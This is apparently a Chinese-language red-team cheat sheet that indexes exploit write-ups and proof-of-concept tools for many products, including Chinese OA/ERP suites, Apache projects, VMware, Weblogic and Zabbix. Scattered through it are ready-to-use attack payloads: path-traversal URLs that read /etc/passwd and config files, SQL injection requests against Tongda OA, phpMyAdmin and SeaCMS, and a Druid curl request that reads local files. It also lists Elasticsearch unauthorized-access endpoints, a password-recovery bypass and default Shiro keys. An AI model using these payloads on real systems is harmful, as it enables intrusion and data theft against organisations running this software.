- 主流供应商的一些攻击性漏洞汇总
- 2021_Hvv漏洞
- 2022年Java应用程序的CVE漏洞
- 漏洞库合集
- 公开的信息、漏洞利用、脚本
- Goby POC
- nuclei-templates
- LiqunKit_
- 强化fscan的漏扫POC库
- 在渗透测试中快速检测常见中间件、组件的高危漏洞。
- OAExploit一款基于产品的一键扫描工具
- 批量扫描破解海康威视、大华等摄像头的常见漏洞。
- 网络摄像头漏洞检测脚本.Nmap (Nse Nmap script engine)
- 网络摄像头漏洞扫描工具 | Webcam vulnerability scanning tool
奥威亚视频云平台VideoCover.aspx接口存在任意文件上传漏洞 附POC
(CNVD-2021-26422)亿邮电子邮件系统 远程命令执行漏洞
泛微e-cology OA Beanshell组件远程代码执行漏洞复现
泛微E-Cology WorkflowServiceXml RCE
泛微OA weaver.common.Ctrl 任意文件上传漏洞
组合利用泛微信息泄漏漏洞和任意用户登录漏洞,可获取全部loginId并测试登录
泛微移动管理平台E-mobile lang2sql接口存在任意文件上传
帆软报表 v8.0 任意文件读取漏洞 CNVD-2018-04757
飞企互联 FE业务协作平台 ShowImageServlet 任意文件读取漏洞
CVE-2021-45897 全球最大CRM系统SuiteCRM远程命令执行漏洞分析与复现
金蝶云星空管理中心 ScpSupRegHandler接口存在任意文件上传漏洞 附POC
金盘 微信管理平台 getsysteminfo 未授权访问漏洞
蓝凌 OA treexml.tmpl script 远程代码执行漏洞
企望制造 ERP comboxstore.action 远程命令执行漏洞
锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
默认Key
fCq+/xW488hMTCD+cmJ3aQ==
zSyK5Kp6PZAAjlT+eeNMlg==
后台任意文件读取
- RuoYi <= v4.5.0
/common/download/resource?resource=/profile/../../../../etc/passwd
Druid 未授权访问
/prod-api/druid/index.html
通达OA任意文件上传和文件包含漏洞导致RCE详细代码审计分析及Poc构造复现
通达 OA 代码审计篇二 :11.8 后台 Getshell
通达OA v11.9 upsharestatus 后台SQL注入漏洞
POST /general/appbuilder/web/portal/workbench/upsharestatus HTTP/1.1
Content-Type: application/x-www-form-urlencoded
uid=15&status=1&id=1;select sleep(4)
网神 SecGate 3600 防火墙 obj_app_upfile 任意文件上传漏洞
网御 ACM上网行为管理系统 bottomframe.cgi SQL注入漏洞
用友GRP-U8行政事业财务管理软件 SQL注入 CNNVD-201610-923
用友NC反序列化漏洞简单记录(DeleteServlet、XbrlPersistenceServlet等)
用友 NC XbrlPersistenceServlet反序列化
用友 移动管理系统 uploadApk.do 任意文件上传漏洞
用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件读取漏洞
用友 U8 CRM客户关系管理系统 getemaildata.php 任意文件上传漏洞
致远 OA A8 htmlofficeservlet getshell (POC&EXP)
致远OA ajaxAction formulaManager 文件上传漏洞
浙大恩特客户资源管理系统fileupload.jsp文件上传
利用最新Apache解析漏洞(CVE-2017-15715)绕过上传黑名单
Apache HTTPD 换行解析漏洞(CVE-2017-15715)
【最新漏洞预警】CVE-2021-40438-Apache httpd mod_proxy SSRF漏洞深入分析与复现
Apache mod_proxy SSRF(CVE-2021-40438)的一点分析和延伸
CVE-2021-41773 | CVE-2021-42013 漏洞利用工具 (Apache/2.4.49-2.4.50)
Apache任意文件读取补丁绕过(CVE-2021-42013)
Apache2.4.50 CVE-2021-41773 cve-2021-42013 复现
ActiveMQ 反序列化漏洞 (CVE-2015-5254)
ActiveMQ任意文件写入漏洞 (CVE-2016-3088)
CVE-2023-46604 之 ActiveMQ RCE 漏洞验证/利用工具
CVE-2022-24112 Apache APISIX apisix/batch-requests RCE
Apisix dashboard未授权访问到rce,含发现poc思路&复现环境
Apache Axis1 与 Axis2 WebService 的漏洞利用总结
[axis 1.4 AdminService未授权访问 jndi注入利用](https://jianfensec.com/渗透测试/axis 1.4 AdminService未授权访问 jndi注入命令执行利用/)
[Apache Druid 远程代码执行漏洞 CVE-2021-25646](http://wiki.peiqi.tech/PeiQi_Wiki/Web服务器漏洞/Apache/Apache Druid/Apache Druid 远程代码执行漏洞 CVE-2021-25646.html)
漏洞复现: Apache Druid 远程代码执行漏洞 (CVE-2021-25646)
Apache Druid CVE-2021-26919 漏洞分析
CVE-2021-36749
curl http://127.0.0.1:8888/druid/indexer/v1/sampler?for=connect -H "Content-Type:application/json" -X POST -d "{\"type\":\"index\",\"spec\":{\"type\":\"index\",\"ioConfig\":{\"type\":\"index\",\"firehose\":{\"type\":\"http\",\"uris\":[\" file:///etc/passwd \"]}},\"dataSchema\":{\"dataSource\":\"sample\",\"parser\":{\"type\":\"string\", \"parseSpec\":{\"format\":\"regex\",\"pattern\":\"(.*)\",\"columns\":[\"a\"],\"dimensionsSpec\":{},\"timestampSpec\":{\"column\":\"no_ such_ column\",\"missingValue\":\"2010-01-01T00:00:00Z\"}}}}},\"samplerConfig\":{\"numRows\":500,\"timeoutMs\":15000}}"
Apache Dubbo (CVE-2023-23638)漏洞利用的工程化实践
CVE-2020-17518&17519:Flink两个漏洞复现
漏洞复现|Apache Flink(CVE-2020-17519)漏洞分析
[CVE-2021-45456 apache kylin命令执行](https://github.com/Awrrays/Awrrays-Team-VulLab/blob/main/Middleware/apache/Apache Kylin/CVE-2021-45456.md)
Apache solr XML 实体注入漏洞 (CVE-2017-12629)
Apache Solr 远程命令执行漏洞 (CVE-2017-12629)
https://github.com/mpgn/CVE-2019-0192/
Apache Solr 远程命令执行漏洞 (CVE-2019-0193)
Apache Solr DataImportHandler 远程代码执行漏洞(CVE-2019-0193) 分析
Apache Solr不安全配置远程代码执行漏洞复现及jmx rmi利用分析
Microsoft Apache Solr RCE Velocity Template | Bug Bounty POC
Apache Solr Velocity RCE 真的getshell了吗?
CVE-2020-13957:Apche Solr 未授权上传漏洞复现
CVE-2020-13957 Apache Solr 未授权上传漏洞
CVE-2020-13957:Apache Solr 未授权上传漏洞复现
Apache Solr<= 8.8.2 (最新) 任意文件删除
CVE-2023-27524 的基本 PoC:Apache Superset 中的不安全默认配置
BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388
版本信息
/coremail/s/json?func=verify
爆破用户名
/coremail/s?func=user:getLocaleUserName
{
"email":"zhangsan"
"defaultURL":"1"
}
Confluence未授权添加管理员用户(CVE-2023-22515)漏洞利用工具
CVE-2022-26134-Godzilla-MEMSHELL
Confluence 文件读取漏洞(CVE-2019-3394)分析
Confluence 未授权 RCE (CVE-2019-3396) 漏洞分析
CVE-2021-26084-Confluence命令执行 全版本内存马注入
Chasing a Dream :: Pre-authenticated Remote Code Execution in Dedecms
Dedecms GetCookie Type Juggling Authentication Bypass Vulnerability
CVE-2020-7471 Django StringAgg SQL Injection漏洞复现
WooYun-2015-137991 Discuz利用UC_KEY进行前台getshell2
Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729)
Discuz! ML远程代码执行(CVE-2019-13956)
CVE-2017-6920:Drupal远程代码执行漏洞分析及POC构造
Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞 (CVE-2017-6920)
https://github.com/vulhub/vulhub/blob/master/drupal/CVE-2018-7600/README.zh-cn.md
Drupal 远程代码执行漏洞(CVE-2018-7602)
CVE-2018-7600/drupa7-CVE-2018-7602.py
https://vulhub.org/#/environments/drupal/CVE-2019-6339/
Drupal(CVE-2020-28948/CVE-2020-28949)分析
http://[ip]:9200
http://[ip]:9200/_plugin/head/
web 管理界面http://[ip]:9200/hello/_search?pretty&size=50&from=50
http://[ip]:9200/_cat/indices
http://[ip]:9200/_river/_search
查看数据库敏感信息http://[ip]:9200/_nodes
查看节点数据http://[ip]:9200/_cat/indices?v
查看当前节点的所有 Indexhttp://[ip]:9200/_search?pretty=true
查询所有的 index, type- Elasticvue - 进行未授权访问漏洞利用的插件
ElasticSearch 命令执行漏洞 (CVE-2014-3120) 测试环境
Remote Code Execution in Elasticsearch - CVE-2015-1427
ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞 (CVE-2015-1427) 测试环境
https://vulhub.org/#/environments/elasticsearch/CVE-2015-3337/
Elasticsearch目录遍历漏洞 (CVE-2015-5531) 复现与分析 (附PoC)
https://blog.csdn.net/u013613428/article/details/121884479
fastadmin最新版前台getshell漏洞 fastadmin文件管理插件
fastjson bypass autotype 1.2.68 with Throwable and AutoCloseable.
CVE-2023-25157 - GeoServer SQL 注入 - PoC
通过the bulk imports UploadsPipeline任意文件读取
Arbitrary file read via the UploadsRewriter when moving and issue
https://github.com/vulhub/vulhub/tree/master/gitea/1.4-rce
https://github.com/goharbor/harbor/security/advisories/GHSA-6qj9-33j4-rvhg
https://www.youtube.com/watch?v=v8Isqy4yR3Q
Hikvision 流媒体管理服务器敏感信息泄漏 海康威视 CVE-2021-36260 RCE 漏洞
HIKVISION iVMS-8700综合安防管理平台 upload.action 任意文件上传
HIKVISION 综合安防管理平台 applyCT Fastjson远程命令执行漏洞
HiKVISION 综合安防管理平台 files 任意文件上传漏洞
HiKVISION 综合安防管理平台 report 任意文件上传漏洞
综合安防管理平台 _svm_api_v1_productFile 远程命令执行
CVE-2017-7269 IIS6.0远程代码执行漏洞分析及Exploit
【漏洞复现】I Doc View 在线文档预览系统远程代码执行漏洞
【漏洞复现】IP-guard WebServer 远程命令执行漏洞
Red Hat JBoss EAP - Deserialization of Untrusted Data
JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149
JBoss JMXInvokerServlet 反序列化漏洞
jmreport/qurestSql 未授权SQL注入批量扫描poc
https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28169/README.zh-cn.md
https://github.com/vulhub/vulhub/blob/master/jetty/CVE-2021-28164/README.zh-cn.md
Hacking Jenkins Part 1 - Play with Dynamic Routing
Hacking Jenkins Part 2 - Abusing Meta Programming for Unauthenticated RCE!
Jenkins任意文件读取漏洞(CVE-2018-1999002)复现记录
Jenkins未授权访问RCE漏洞复现记录 | angelwhu_blog
CVE-2017-8917 - SQL injection Vulnerability Exploit in Joomla 3.7.0
Joomla! 3.7 Core SQL 注入 (CVE-2017-8917)漏洞分析
JumpServer远程命令执行你可能不知道的点(附利用工具)
JumpServer 任意文件写入漏洞 CVE-2023-42819 + CVE-2023-42820 = GetShell
Laravel 6.x/7.x的一条执行代码的反序列化利用链
LARAVEL <= V8.4.2 DEBUG MODE: REMOTE CODE EXECUTION
漏洞分析 | Laravel Debug页面RCE(CVE-2021-3129)分析复现
再谈Laravel Debug mode RCE(CVE-2021-3129)漏洞
Laravel 8.x image upload bypass
️ 🤬CVE-2021-44228 - LOG4J Java 漏洞利用 - WAF 绕过技巧
maccms10\extend\upyun\src\Upyun\Api\Format.php
maccms10\extend\Qcloud\Sms\Sms.php
密码 WorldFilledWithLove
Milesight VPN server.js 任意文件读取漏洞
(CVE-2023-28432) | MinIO verify 接口敏感信息泄露漏洞
https://github.com/minio/console/security/advisories/GHSA-4999-659w-mq36
CNVD-2021-10543:MessageSolution 企业邮件归档管理系统 EEA 存在信息泄露漏洞
MetInfo5.3.19安装过程过滤不严导致Getshell
Metinfo7.0 SQL Blind Injection
Metabase validate 远程命令执行漏洞 CVE-2023-38646
大部分企业的 nacos 的 url 为 /v1/auth/users ,而不是 /nacos/v1/auth/users
NETGEAR ProSafe SSL VPN SQL 注入漏洞
Nexus Repository Manager 3 远程命令执行漏洞 (CVE-2019-7238)
Nexus Repository Manager(CVE-2020-10199/10204)漏洞分析及回显利用方法的简单讨论
CVE-2020-29436:Nexus3 XML外部实体注入复现
『漏洞复现』记 Openfire 身份认证绕过漏洞导致 RCE
CVE-2021-35587 Oracle Access Manager 未经身份验证的攻击者漏洞
phpMyAdmin 4.6.2 - (Authenticated) Remote Code Execution
phpMyAdmin任意文件读取漏洞复现(CVE-2019-6799)以及检测POC编写
CVE-2020-26935 phpmyadmin后台SQL注入
/tbl_zoom_select.php?db=pentest&table=a&get_data_row=1&where_clause=updatexml(1,concat(0x7e,user()),1)
phpmywind最新版sql注入以及后台目录遍历和文件读取
https://www.exploit-db.com/exploits/42535
PigCMS action_flashUpload 任意文件上传漏洞
app="海洋CMS"
攻击者可通过对admin_members_group.php的编辑操作中的id参数利用该漏洞进行SQL注入攻击。
/admin_members_group.php?action=edit&id=2%20and%20if(mid(user(),1,1)=%27r%27,concat(rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27),rpad(1,999999,%27a%27))%20RLIKE%20%27(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2b(a.*)%2bcd%27,1)
基于SerializationDumper的Shiro Cookie序列化数据解密小工具
改造BeichenDream/InjectJDBC加入shiro获取key和修改key功能
burp插件 ShiroScan 主要用于框架、无dnslog key检测
ShopXO download 任意文件读取漏洞 CNVD-2021-15822
找回密码
管理员的 “密码找回问题答案” 为非强制项,一般都留空。此时如果在密码找回页面,输入空密码找回答案,就可以获得当前管理员的密码明文(页面有做 javascript 限制答案长度不能为 0,但禁用 javascript 即可绕过)
访问 /siteserver/forgetPassword.aspx, 然后禁止 Javascript。输入用户名,获取密码
某Server CMS最新6.8.3版本验证码绕过&后台多处注入
简记野生应急捕获到的siteserver远程模板下载Getshell漏洞
zhaoweiho/SiteServer-CMS-Remote-download-Getshell
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
Spring-cloud-function SpEL RCE, Vultarget & Poc
Spring boot Fat Jar 任意写文件漏洞到稳定 RCE 利用技巧
基于springboot和spring security的Java web常见漏洞及安全代码
SpringBoot 相关漏洞学习资料,利用方法和技巧合集,黑盒安全评估 check list
S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE
远程代码执行S2-062 CVE-2021-31805验证POC
一款检测Struts2 RCE漏洞的burp被动扫描插件,仅检测url后缀为.do以及.action的数据包
ThinkAdminV6 未授权访问and 任意文件查看 漏洞复现
实战技巧|利用ThinkPHP5.X的BUG实现数据库信息泄露
https://mp.weixin.qq.com/s/1ZkiKqHogWOy0U4rQNnGtQ
日志泄露
/Application/Runtime/Logs/Home/16_09_06.log # 其中 Application 可能会变,比如 App
/Runtime/Logs/Home/16_09_06.log # 年份_月份_日期
/Runtime/Logs/User/16_09_06.log # 年份_月份_日期
thinkphp6 session 任意文件创建漏洞复现 含POC
ThinkPHP 漏洞 综合利用工具, 图形化界面, 命令执行, 一键getshell, 批量检测, 日志遍历, session包含, 宝塔绕过 -
拿来即用的Tomcat7/8/9/10版本Listener/Filter/Servlet内存马,支持注入CMD内存马和冰蝎内存马
CVE-2022-26377:使用proxy_ajp对 Tomcat AJP 进行反向代理,可构造 AJP 数据包攻击后端服务
CVE-2022-29885:Apache Tomcat 集群服务Listener中的拒绝服务漏洞
用于扫描 Apache Tomcat 服务器漏洞的 python 脚本。
CVE-2022-25064 TP-LINK TL-WR840N RCE
[UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率](https://jianfensec.com/渗透测试/UEditor 1.4.3.3验证SSRF漏洞提高DNS rebinding成功率/)
CVE-2021-21974 VMWare ESXi RCE Exploit
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
利用 VMWare Horizon 中的 CVE-2021-44228 进行远程代码执行等
VMWare vRealize SSRF-CVE-2021-21975
CVE-2022-22972 的 POC 影响 VMware Workspace ONE、vIDM 和 vRealize Automation 7.6。
从 vCenter 备份中提取 IdP 证书并以管理员身份登录的工具
Vcenter Server CVE-2021-21985 RCE PAYLOAD
CVE-2021-21985 (Vulnerable Code)
VMWare vRealize Network Insight Pre-Authenticated RCE (CVE-2023-20887)
weblogic t3 deserialization rce
Weblogic一键漏洞检测工具,V1.5,更新时间:20200730
About WeblogicTool,GUI漏洞利用工具,支持漏洞检测、命令执行、内存马注入、密码解密等(深信服深蓝实验室天威战队强力驱动)
CVE-2020-14882&CVE-2020-14883 Weblogic未授权远程命令执行漏洞
KrE80r/webmin_cve-2019-12840_poc
vulhub/webmin/CVE-2019-15107/README.zh-cn.md
IBM Websphere Portal - Persistent Cross-Site Scripting
Websphere ND远程命令执行分析以及构造RpcServerDispatcher Payload(CVE-2019-4279)
WebSphere XXE 漏洞分析(CVE-2020-4643)
Turning bad SSRF to good SSRF: Websphere Portal
WSO2 RCE (CVE-2022-29464) 漏洞利用
CVE-2020-15148 Yii2反序列化RCE POP链分析
Maskhe/CVE-2020-15148-bypasses
zabbix latest.php SQL注入漏洞 (CVE-2016-10134)
Zabbix sql注入漏洞复现(CVE-2016-10134)
CVE-2020-11800 zabbix RCE漏洞细节披露
CVE-2021-27927: Zabbix-CSRF-to-RCE
CVE-2022-23131 Zabbix SAML SSO认证绕过漏洞分析与复现
CVE-2022-23134 Zabbix漏洞分析之二:从未授权访问到接管后台
CNVD-2020-65242 后台任意文件下载
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=/etc/passwd&type=file
index.php?m=file&f=sendDownHeader&fileName=2&fileType=1&content=./../../config/my.php&type=file
后台 im 模块 downloadXxdPackage 函数任意文件下载
index.php?m=im&f=downloadXxdPackage&xxdFileName=../../../../../../../../../etc/passwd